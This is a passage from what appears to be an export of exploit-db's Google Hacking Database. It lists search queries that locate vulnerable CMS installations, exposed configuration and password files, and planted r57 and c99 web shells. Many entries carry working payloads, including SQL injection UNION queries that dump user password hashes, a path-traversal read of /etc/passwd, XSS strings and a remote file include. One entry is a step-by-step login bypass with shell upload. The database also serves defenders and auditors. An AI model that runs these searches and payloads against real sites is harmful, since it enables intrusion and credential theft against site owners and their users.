"signatureReferenceNumber": "3585", "link": "https://www.exploit-db.com/ghdb/3585/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22X7+Chat+Help+Center%22|%22Powered+By+X7+Chat%22", "shortDescription": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "textualDescription": "X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156: \nhttp://www.exploit-db.com/exploits/1738" }, { "signatureReferenceNumber": "3586", "link": "https://www.exploit-db.com/ghdb/3586/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+gcards%22", "shortDescription": "\"powered by gcards\"", "textualDescription": "gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346: \nhttp://www.exploit-db.com/exploits/1595" }, { "signatureReferenceNumber": "3587", "link": "https://www.exploit-db.com/ghdb/3587/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=pixelpost+%22RSS+2.0%22+%22ATOM+feed%22+%22Valid+xHTML+/+Valid+CSS", "shortDescription": "pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"", "textualDescription": "Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889: \nhttp://www.exploit-db.com/exploits/1868" }, { "signatureReferenceNumber": "3589", "link": "https://www.exploit-db.com/ghdb/3589/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"This web site was made with MD-Pro\"", "shortDescription": "\"This web site was made with MD-Pro\"", "textualDescription": "CVE: 2006-7112\nEDB-ID: 2712\n\nThis search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP." }, { "signatureReferenceNumber": "3590", "link": "https://www.exploit-db.com/ghdb/3590/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"Powered+by+XMB\"", "shortDescription": "\"Powered by XMB\"", "textualDescription": "CVE: 2006-3994\nEDB-ID: 2105\nThis search can potentially identify vulnerable installations of XMB" }, { "signatureReferenceNumber": "3591", "link": "https://www.exploit-db.com/ghdb/3591/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"powered by ThWboard\"", "shortDescription": "\"powered by ThWboard\"", "textualDescription": "CVE: 2007-0340\nEDB-ID: 3124\n\nThis search can potentially identify vulnerable installations of ThWboard." }, { "signatureReferenceNumber": "3592", "link": "https://www.exploit-db.com/ghdb/3592/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Page+created+in%22+%22seconds+by+glFusion%22++%2BRSS", "shortDescription": "\"Page created in\" \"seconds by glFusion\" +RSS", "textualDescription": "CVE: 2009-1281\nEDB-ID: 8347\n\nThis search can potentially identify vulnerable installations of glFusion.\n\n\nhttp://www.exploit-db.com/exploits/8347" }, { "signatureReferenceNumber": "3593", "link": "https://www.exploit-db.com/ghdb/3593/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:wp-login.php Register Username Password -echo", "shortDescription": "inurl:wp-login.php Register Username Password -echo", "textualDescription": "CVE: 2006-2667\nEDB-ID: 6\n\nThis search can potentially identify vulnerable installations of WordPress." }, { "signatureReferenceNumber": "3594", "link": "https://www.exploit-db.com/ghdb/3594/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22this+site+is+using+the+webspell+script+%28version%3A+4.01.02%29%22", "shortDescription": "\"this site is using the webspell script (version: 4.01.02)\"", "textualDescription": "CVE: 2007-0502\nEDB-ID: 3172\nThis search can potentially identify vulnerable installations of webSPELL 4.01.02" }, { "signatureReferenceNumber": "3595", "link": "https://www.exploit-db.com/ghdb/3595/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/#sclient=psy&hl=en&q=:insite%3A+SmarterMail+Enterprise+7.1&aq=f&aqi=&aql=&oq=&gs_rfai=&pbx=1&fp=53894057c0dc71cc", "shortDescription": "insite: SmarterMail Enterprise 7.1", "textualDescription": "http://www.exploit-db.com/exploits/15185" }, { "signatureReferenceNumber": "3596", "link": "https://www.exploit-db.com/ghdb/3596/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_sqlreport%22", "shortDescription": "inurl:\"com_sqlreport\"", "textualDescription": "Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability - CVE: 2010-0753: http://www.exploit-db.com/exploits/11549" }, { "signatureReferenceNumber": "3598", "link": "https://www.exploit-db.com/ghdb/3598/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Quick.Cart%22", "shortDescription": "\"Powered by Quick.Cart\"", "textualDescription": "Quick.Cart 2.2 RFI/LFI Remote Code Execution Exploit - CVE: 2007-3138: http://www.exploit-db.com/exploits/4025" }, { "signatureReferenceNumber": "3599", "link": "https://www.exploit-db.com/ghdb/3599/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Shadowed+Portal%22", "shortDescription": "\"Powered by Shadowed Portal\"", "textualDescription": "Shadowed Portal 5.7d3 Remote Command Execution Exploit: http://www.exploit-db.com/exploits/4768" }, { "signatureReferenceNumber": "3600", "link": "https://www.exploit-db.com/ghdb/3600/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+bitweaver%22", "shortDescription": "\"powered by bitweaver\"", "textualDescription": "bitweaver 1.3 (tmpImagePath) Attachment mod_mime Exploit - CVE: 2006-3105: http://www.exploit-db.com/exploits/1918" }, { "signatureReferenceNumber": "3601", "link": "https://www.exploit-db.com/ghdb/3601/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?ind=blog%22", "shortDescription": "inurl:\"index.php?ind=blog\"", "textualDescription": "MKPortal 1.2.1 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7796/" }, { "signatureReferenceNumber": "3603", "link": "https://www.exploit-db.com/ghdb/3603/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=(%22powered+by+nocc%22+intitle:%22NOCC+Webmail%22)+-site:sourceforge.net+-Zoekinalles.nl+-analysis", "shortDescription": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "textualDescription": "NOCC Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891: http://www.exploit-db.com/exploits/1522/" }, { "signatureReferenceNumber": "3614", "link": "https://www.exploit-db.com/ghdb/3614/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22?delete%22%20+intext:%22PHP%20version%22%20+intext:%22Safe_mode%22", "shortDescription": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "textualDescription": "Matches some well known phpshells (r57 and the like)." }, { "signatureReferenceNumber": "3615", "link": "https://www.exploit-db.com/ghdb/3615/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22?act=phpinfo%22", "shortDescription": "inurl:\"?act=phpinfo\"", "textualDescription": "Match some well known phpshells (c99 and ironwarez and the like)." }, { "signatureReferenceNumber": "3616", "link": "https://www.exploit-db.com/ghdb/3616/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=%22Site+produced+by+GeneralProducts.co.uk%22", "shortDescription": "\"Site produced by GeneralProducts.co.uk\"", "textualDescription": "GeneralProducts (index.php?page=) Local File Inclusion Vulnerability\nhttp://server/index.php?page=../../../../../../etc/passwd\nNet.Edit0r - black.hat.tm@gmail.com" }, { "signatureReferenceNumber": "3617", "link": "https://www.exploit-db.com/ghdb/3617/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?option=com_jeajaxeventcalendar%22", "shortDescription": "inurl:\"index.php?option=com_jeajaxeventcalendar\"", "textualDescription": "Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Vulnerability Author: altbta" }, { "signatureReferenceNumber": "3618", "link": "https://www.exploit-db.com/ghdb/3618/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20by%20SiteEngine%22", "shortDescription": "\"Powered by SiteEngine\"", "textualDescription": "SiteEngine 7.1 SQL injection Vulnerability: http://www.exploit-db.com/exploits/15612" }, { "signatureReferenceNumber": "3619", "link": "https://www.exploit-db.com/ghdb/3619/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:+log+inurl:%22access.log%22+%2Bintext:%22HTTP/1.1%22", "shortDescription": "filetype: log inurl:\"access.log\" +intext:\"HTTP/1.1\"", "textualDescription": "Match some apache access.log files.\n\nAuthor: susmab" }, { "signatureReferenceNumber": "3620", "link": "https://www.exploit-db.com/ghdb/3620/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?option=com_competitions%22", "shortDescription": "inurl:\"index.php?option=com_competitions\"", "textualDescription": "SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&menu=XroGuE Author: Ashiyane Digital Security Team" }, { "signatureReferenceNumber": "3621", "link": "https://www.exploit-db.com/ghdb/3621/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?option=com_storedirectory%22", "shortDescription": "inurl:\"index.php?option=com_storedirectory\"", "textualDescription": "SQL Injection Vulnerability: http://127.0.0.1/index.php?option=com_storedirectory&task=view&id=-16 UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users \nAuthor: Ashiyane Digital Security Team" }, { "signatureReferenceNumber": "3622", "link": "https://www.exploit-db.com/ghdb/3622/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?option=com_catalogue%22", "shortDescription": "inurl:\"index.php?option=com_catalogue\"", "textualDescription": "Author: Ashiyane Digital Security Team SQL Injection: http://server/index.php?option=com_catalogue&Itemid=73&cat_id=-999 union select 1,version(),user(),4,5,6" }, { "signatureReferenceNumber": "3623", "link": "https://www.exploit-db.com/ghdb/3623/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php?option=com_doqment&cid=", "shortDescription": "inurl:index.php?option=com_doqment&cid=", "textualDescription": "Author: KedAns-Dz http://server/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--" }, { "signatureReferenceNumber": "3624", "link": "https://www.exploit-db.com/ghdb/3624/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php?option=com_annuaire%22", "shortDescription": "inurl:\"index.php?option=com_annuaire\"", "textualDescription": "SQL Injection Vulnerability: \n[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]\n[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--\n\nSubmitter: Ashiyane Digital Security Team" }, { "signatureReferenceNumber": "3625", "link": "https://www.exploit-db.com/ghdb/3625/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=%22Powered+By+Dejcom+Market+CMS%22", "shortDescription": "\"Powered By Dejcom Market CMS\"", "textualDescription": "Submitter:Mormoroth PoC: http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--" }, { "signatureReferenceNumber": "3626", "link": "https://www.exploit-db.com/ghdb/3626/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=php+Kolay+Forum+(php+KF)+%C2%A9+2007+-+2010+phpKF+Ekibi", "shortDescription": "php Kolay Forum (php KF) \u00a9 2007 - 2010 phpKF Ekibi", "textualDescription": "Submitter: FreWaL CSRF Vulnerability: http://www.exploit-db.com/exploits/15685" }, { "signatureReferenceNumber": "3627", "link": "https://www.exploit-db.com/ghdb/3627/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SOOP%20Portal%202.0%22", "shortDescription": "\"SOOP Portal 2.0\"", "textualDescription": "Submitted by: Net.Edit0r Shell Upload: http://www.exploit-db.com/exploits/15690" }, { "signatureReferenceNumber": "3628", "link": "https://www.exploit-db.com/ghdb/3628/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_lqm%20%22showResults%22", "shortDescription": "inurl:index.php?option=com_lqm \"showResults\"", "textualDescription": "Submitter: Snakespc SQL Injection: http://server/index.php?option=com_lqm&query=7&task=showResults&Itemid=158&lang=en&lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us" }, { "signatureReferenceNumber": "3629", "link": "https://www.exploit-db.com/ghdb/3629/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.exploit-db.com/exploits/15699", "shortDescription": "intitle:PhpMyAdmin inurl:error.php", "textualDescription": "intitle:PhpMyAdmin inurl:error.php" }, { "signatureReferenceNumber": "3630", "link": "https://www.exploit-db.com/ghdb/3630/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:page.php%3FintPageID%3D", "shortDescription": "inurl:page.php?intPageID=", "textualDescription": "Submitter: Srblche SQL Injection: http://server/page.php?intPageID=[SQL]" }, { "signatureReferenceNumber": "3631", "link": "https://www.exploit-db.com/ghdb/3631/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:configuration.php-dist", "shortDescription": "inurl:configuration.php-dist", "textualDescription": "locates the default configuration file of JOOMLA Author: ScOrPiOn" }, { "signatureReferenceNumber": "3632", "link": "https://www.exploit-db.com/ghdb/3632/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:%22config.php.new%22+%2Bvbulletin", "shortDescription": "inurl:\"config.php.new\" +vbulletin", "textualDescription": "locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe" }, { "signatureReferenceNumber": "3633", "link": "https://www.exploit-db.com/ghdb/3633/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22[+phpinfo+]++[+php.ini+]++[+cpu+]++[+mem+]++[+users+]++[+tmp+]++[+delete+]%22", "shortDescription": "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"", "textualDescription": "Locates r57 web shells Author: ScOrPiOn" }, { "signatureReferenceNumber": "3634", "link": "https://www.exploit-db.com/ghdb/3634/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22r57shell+1.4%22", "shortDescription": "\"r57shell 1.4\"", "textualDescription": "Locates r57 web shells Author: ScOrPiOn" }, { "signatureReferenceNumber": "3635", "link": "https://www.exploit-db.com/ghdb/3635/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22r57shell%22", "shortDescription": "\"r57shell\"", "textualDescription": "Locates r57 web shells Author: ScOrPiOn" }, { "signatureReferenceNumber": "3636", "link": "https://www.exploit-db.com/ghdb/3636/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20by%20SOOP%20Portal%20Raven%201.0b%22", "shortDescription": "\"Powered by SOOP Portal Raven 1.0b\"", "textualDescription": "Submitter: Sun Army - http://www.exploit-db.com/exploits/15703" }, { "signatureReferenceNumber": "3637", "link": "https://www.exploit-db.com/ghdb/3637/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22safe_mode:+*++PHP+version:+*++cURL:+*++MySQL:+*++MSSQL:+*++PostgreSQL:+*++Oracle:+*%22", "shortDescription": "\"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *\"", "textualDescription": "Locates r57 web shells Author: ScOrPiOn" }, { "signatureReferenceNumber": "3638", "link": "https://www.exploit-db.com/ghdb/3638/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22plugins/wp-db-backup/wp-db-backup.php%22", "shortDescription": "\"plugins/wp-db-backup/wp-db-backup.php\"", "textualDescription": "Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn" }, { "signatureReferenceNumber": "3639", "link": "https://www.exploit-db.com/ghdb/3639/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22www.*.com+-+c99shell%22+OR+%22www.*.net+-+c99shell%22+OR+%22www.*.org+-+c99shell%22", "shortDescription": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "textualDescription": "Locates c99 web shells Author: ScOrPiOn" }, { "signatureReferenceNumber": "3640", "link": "https://www.exploit-db.com/ghdb/3640/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22CGI-Telnet+Unit-x+Team+Connected+to+*.com%22+OR+%22CGI-Telnet+Unit-x+Team+Connected+to%22", "shortDescription": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "textualDescription": "Locates CGI-Telnet web shells. Author: ScOrPiOn" }, { "signatureReferenceNumber": "3641", "link": "https://www.exploit-db.com/ghdb/3641/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:phpinfo.php", "shortDescription": "inurl:phpinfo.php", "textualDescription": "Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Author: ScOrPiOn" }, { "signatureReferenceNumber": "3642", "link": "https://www.exploit-db.com/ghdb/3642/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:/vb/install/install.php", "shortDescription": "inurl:/vb/install/install.php", "textualDescription": "Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn" }, { "signatureReferenceNumber": "3643", "link": "https://www.exploit-db.com/ghdb/3643/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:/vb/install/upgrade.php", "shortDescription": "inurl:/vb/install/upgrade.php", "textualDescription": "Vbulletin custom updrade wizards. Author: ScOrPiOn" }, { "signatureReferenceNumber": "3644", "link": "https://www.exploit-db.com/ghdb/3644/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_amresurrected", "shortDescription": "inurl:com_amresurrected", "textualDescription": "Submitter: Bl4ck.Viper SQL Injection: index.php?option=com_amresurrected&Itemid=[Sqli]" }, { "signatureReferenceNumber": "3645", "link": "https://www.exploit-db.com/ghdb/3645/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allinurl:/xampp/security.php", "shortDescription": "allinurl:/xampp/security.php", "textualDescription": "XAMPP Security Setting Page Information Disclosure. Author: modpr0be" }, { "signatureReferenceNumber": "3646", "link": "https://www.exploit-db.com/ghdb/3646/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:panorama-viewer.php?id=", "shortDescription": "inurl:panorama-viewer.php?id=", "textualDescription": "[-] \nhttp://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--\n\n\n[-] http://server/adm/users.php\n\n[-] http://server/adm/panorama_edit.php?id=1\n\n[-] http://server/listimages/shell.php\n\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor / \nHUrr!c4nE / Cair3x /novin security team and all iranian hackers\n\n#################################################################" }, { "signatureReferenceNumber": "3647", "link": "https://www.exploit-db.com/ghdb/3647/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:showcat.asp?id=", "shortDescription": "inurl:showcat.asp?id=", "textualDescription": "========================================\nCentralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability\n\n\n========================================\n\n#################################################################\n# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability\n\n \n# Date : 10 December 2010\n \n# Author : ali.erroor\n \n# Version : n/a\n \n# Googel DorK : inurl:showcat.asp?id=\n \n# Home : www.network-security.ir\n \n# Email : ali.erroor@att.net\n \n\n#################################################################\n \n[+] Exploit\n \n[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..\n\n\n[-] http://localhost/path/admin/dbedit.asp?table=products\n \n[-] username : 'or''='\n[-] password : 'or''='\n\n\n[2] Create New Upload Your Shell.Asp ..\n\n[-] http://localhost/path/admin/dbedit.asp?a=upload_init\n\n \n[3] To See Shell Edit Your uploads\n\n[-] http://localhost/path/uploads/shell;asp.jpg\n \n[+] Demo\n\n[-] http://server/admin/dbedit.asp?table=products\n\n\n[-] http://server/admin/dbedit.asp?a=upload_init\n\n\n\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE \n/ Cair3x /novin security team and all iranian hackers\n\n#################################################################" }, { "signatureReferenceNumber": "3648", "link": "https://www.exploit-db.com/ghdb/3648/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22POWERED+BY:+WEBINSPIRE%22", "shortDescription": "\"POWERED BY: WEBINSPIRE\"", "textualDescription": "Author: ghost-dz SQL Injection: http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--" }, { "signatureReferenceNumber": "3649", "link": "https://www.exploit-db.com/ghdb/3649/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"powered+by+simpleview+CMS\"", "shortDescription": "\"powered by simpleview CMS\"", "textualDescription": "Author: Sun Army XSS: /search/?searchString=\">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13" }, { "signatureReferenceNumber": "3650", "link": "https://www.exploit-db.com/ghdb/3650/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"Powered+By+PageAdmin+CMS+Free+Version\"", "shortDescription": "\"Powered By PageAdmin CMS Free Version\"", "textualDescription": "Author: Sun Army XSS: /include/search.aspx?keycode=\">xss ByTakpar&type=1&language=en" }, { "signatureReferenceNumber": "3651", "link": "https://www.exploit-db.com/ghdb/3651/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%20Copyright+MantisBT%20Group", "shortDescription": "intext: Copyright+MantisBT Group", "textualDescription": "Mantis Bug Tracker\nhttp://mantisbt.org\n\nhttp://www.exploit-db.com/exploits/15735\nhttp://www.exploit-db.com/exploits/15736\n\nThanks,*\n\nGjoko 'LiquidWorm' Krstic*\n*Information Security Engineer*\n\n***Zero Science Lab*\nMacedonian Information Security Research & Development Laboratory\nhttp://www.zeroscience.mk\n\n+389 (0) 75 290 926\n+389 (0) 77 670 886" }, { "signatureReferenceNumber": "3652", "link": "https://www.exploit-db.com/ghdb/3652/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"produtos.asp?produto=\"", "shortDescription": "inurl:\"produtos.asp?produto=\"", "textualDescription": "Submitter: Br0ly http://www.exploit-db.com/exploits/15776" }, { "signatureReferenceNumber": "3653", "link": "https://www.exploit-db.com/ghdb/3653/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_jeauto", "shortDescription": "inurl:com_jeauto", "textualDescription": "LFI: http://www.exploit-db.com/exploits/15779" }, { "signatureReferenceNumber": "3654", "link": "https://www.exploit-db.com/ghdb/3654/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+IRIran.net%22", "shortDescription": "\"Powered by: IRIran.net\"", "textualDescription": "IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL] \nSubmitter: Ahoora" }, { "signatureReferenceNumber": "3655", "link": "https://www.exploit-db.com/ghdb/3655/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:index.php?db=information_schema", "shortDescription": "allinurl:index.php?db=information_schema", "textualDescription": "Submitter: modpr0be phpMyAdmin Direct Access to information_schema Database" }, { "signatureReferenceNumber": "3656", "link": "https://www.exploit-db.com/ghdb/3656/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=%22Powered+by+CubeCart+3.0.4%22", "shortDescription": "\"Powered by CubeCart 3.0.4\"", "textualDescription": "CSRF:http://www.exploit-db.com/exploits/15822" }, { "signatureReferenceNumber": "3657", "link": "https://www.exploit-db.com/ghdb/3657/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=%22Powered+by+KaiBB+1.0.1%22", "shortDescription": "\"Powered by KaiBB 1.0.1\"", "textualDescription": "Multiple Vulnerabilities:http://www.exploit-db.com/exploits/15846/" }, { "signatureReferenceNumber": "3658", "link": "https://www.exploit-db.com/ghdb/3658/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Website%20Design%20by%20Rocktime%22", "shortDescription": "\"Website Design by Rocktime\"", "textualDescription": "Submitter: n0n0x http://server/product.php?fdProductId=[SQL Injection]" }, { "signatureReferenceNumber": "3659", "link": "https://www.exploit-db.com/ghdb/3659/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20by%20UNO.com.my%22", "shortDescription": "\"Powered by UNO.com.my\"", "textualDescription": "Submitter: SiKodoQ http://127.0.0.1/[path]/page.php?pid=[SQLi]" }, { "signatureReferenceNumber": "3660", "link": "https://www.exploit-db.com/ghdb/3660/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22/index.php?id=cmp-noticias%22", "shortDescription": "\"/index.php?id=cmp-noticias\"", "textualDescription": "Submitter: xoron http://server/index.php?id=cmp-noticias&n=[SQLi]" }, { "signatureReferenceNumber": "3661", "link": "https://www.exploit-db.com/ghdb/3661/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"/gadmin/index.php\"", "shortDescription": "inurl:\"/gadmin/index.php\"", "textualDescription": "Author: AtT4CKxT3rR0r1ST SQL Injection: www.site.com/gallery.php?id=null[Sql Injection]" }, { "signatureReferenceNumber": "3662", "link": "https://www.exploit-db.com/ghdb/3662/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered%20by%20YourTube%20v1.0%22", "shortDescription": "\"Powered by YourTube v1.0\"", "textualDescription": "Author: AtT4CKxT3rR0r1ST CSRF: http://www.exploit-db.com/exploits/15892" }, { "signatureReferenceNumber": "3663", "link": "https://www.exploit-db.com/ghdb/3663/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22com_eventcal%22", "shortDescription": "inurl:\"com_eventcal\"", "textualDescription": "Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] RFI: www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]" }, { "signatureReferenceNumber": "3665", "link": "https://www.exploit-db.com/ghdb/3665/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22POWERED%20BY%20ALITALK%22", "shortDescription": "\"POWERED BY ALITALK\"", "textualDescription": "intext:\"POWERED BY ALITALK\"" }, { "signatureReferenceNumber": "3666", "link": "https://www.exploit-db.com/ghdb/3666/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22POWERED%20BY%20phpMySport%22", "shortDescription": "\"Powered by phpMySport\"", "textualDescription": "intext:\"Powered by phpMySport\" Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15921/" }, { "signatureReferenceNumber": "3668", "link": "https://www.exploit-db.com/ghdb/3668/", "category": "Footholds", "querystring": "http://www.google.com/search?q=allintext:\"fs-admin.php\"", "shortDescription": "allintext:\"fs-admin.php\"", "textualDescription": "A foothold using allintext:\"fs-admin.php\" shows the world readable \ndirectories of a plug-in that enables Wordpress to be used as a forum. Many \nof the results of the search also show error logs which give an attacker the \nserver side paths including the home directory name. This name is often also \nused for the login to ftp and shell access, which exposes the system to \nattack. There is also an undisclosed flaw in version 1.3 of the software, as \nthe author has mentioned in version 1.4 as a security fix, but does not tell \nus what it is that was patched.\n\n \nAuthor: DigiP" }, { "signatureReferenceNumber": "3667", "link": "https://www.exploit-db.com/ghdb/3667/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22jscripts/tiny_mce/plugins/tinybrowser/%22+OR+inurl:%22jscripts/tiny_mce/plugins/tinybrowser/%22+%22index+of%22", "shortDescription": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "textualDescription": "Author: DigiP Multiple Vulnerabilities: http://www.exploit-db.com/exploits/9296/" }, { "signatureReferenceNumber": "3669", "link": "https://www.exploit-db.com/ghdb/3669/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "shortDescription": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "textualDescription": "Google search for web site build with symfony framework. This file\ncontains the login / password for the databases\nAuthor: Simon Leblanc" }, { "signatureReferenceNumber": "3670", "link": "https://www.exploit-db.com/ghdb/3670/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:web/frontend_dev.php -trunk", "shortDescription": "inurl:web/frontend_dev.php -trunk", "textualDescription": "Google search for web site build with symfony framework and in\ndevelopment environment.\n\nIn most case, you have a bar development on top of the web page. If you\ngo in config -> Settings, you can find login and password.\n\nif you replace web/frontend_dev.php by 